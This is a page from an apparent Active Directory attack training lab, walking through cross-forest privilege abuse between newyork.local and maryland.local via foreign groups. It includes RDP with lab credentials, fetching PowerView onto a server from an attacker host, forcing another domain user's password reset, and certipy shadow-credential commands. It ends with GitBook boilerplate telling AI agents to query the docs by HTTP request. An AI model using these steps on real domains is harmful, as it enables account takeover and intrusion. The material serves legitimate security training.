> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/trust/forest-trust-newyork.local-greater-than-maryland.local/foreign-group-and-users.md).

# Foreign group and users

### Foreign group and users <a href="#foreign-group-and-users" id="foreign-group-and-users"></a>

* On bloodhound we can see very easily that there is link between the domains with the following query *(Careful this query is fine in a lab but this will certainly be a little too heavy in a real world AD)*

### NewYork.Local

<figure><img src="/files/jMJseS4gFggcJhsGQxyG" alt=""><figcaption></figcaption></figure>

### North.NewYork.Local

<figure><img src="/files/lh5lUUzll5aGyWeDpLoC" alt=""><figcaption></figcaption></figure>

### Maryland.Local

<figure><img src="/files/lSHBoOJT9omNsBakQoKa" alt=""><figcaption></figcaption></figure>

* On the lab you will find some specifics groups to pass from one domain to the other.
* As you already have done the acl part previously you will easily find the way to exploit that.&#x20;
* newyork.local to maryland.local: group KGB
* To do that just pick a user from the RadioCity  and exploit with the KGB group

### RDP

```
xfreerdp /d:newyork.local /u:diego.montenegro /p:letsdothis /v:192.168.56.10 /cert-ignore
```

### Loading PowerView\.ps1 to ParrotOS Lab Machine

```
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
```

### Uploading it to the Windows Server

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\diego.montenegro\Documents\PowerView.ps1')
```

```
Get-NetGroupMember -Identity "KGB" -Domain Maryland.local
```

### Change Teresa PWD

```
net rpc password teresa.Perez -U newyork.local/diego.montenegro%letsdothis -S baltimore.maryland.local
Enter new password for teresa.Perez: <here we enter Password123>
```

### And verify

```
crackmapexec smb 192.168.56.12 -u teresa.Perez -p 'Password123' -d maryland.local
```

<figure><img src="/files/vLO78U9buv4xOYy55SjM" alt=""><figcaption></figcaption></figure>

* We can also to that with shadow credentials (but the auto will not work here, we will have to do that with two steps)

```
certipy shadow add -u diego.montenegro@newyork.local -p 'letsdothis' \
 -dc-ip 192.168.56.12 -target baltimore.maryland.local -account 'teresa.perez'
```

```
certipy auth -pfx teresa.perez.pfx -username teresa.perez -domain maryland.local -dc-ip 192.168.56.12
```

* Maryland to NewYork : group MainMultiDoms

In the same way we can exploit the Maryland to NewYork foreign group


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/trust/forest-trust-newyork.local-greater-than-maryland.local/foreign-group-and-users.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.